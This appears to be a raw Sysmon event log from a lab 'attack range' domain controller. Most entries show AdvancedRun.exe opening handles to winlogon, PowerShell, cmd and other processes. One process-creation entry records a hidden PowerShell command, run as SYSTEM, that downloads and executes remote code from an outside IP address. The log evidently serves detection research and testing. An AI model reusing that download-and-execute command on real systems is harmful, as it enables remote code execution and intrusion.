20:16:38.224{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.224{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.218{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.217{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.217{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.217{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
154100x80000000000000004077910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.059{834264DD-14A3-61EB-9308-000000002702}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator
10341000x80000000000000004077909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.058{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004077908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.058{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004077907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.057{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.057{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.056{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004077902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004077901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004077900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004077899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004077898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
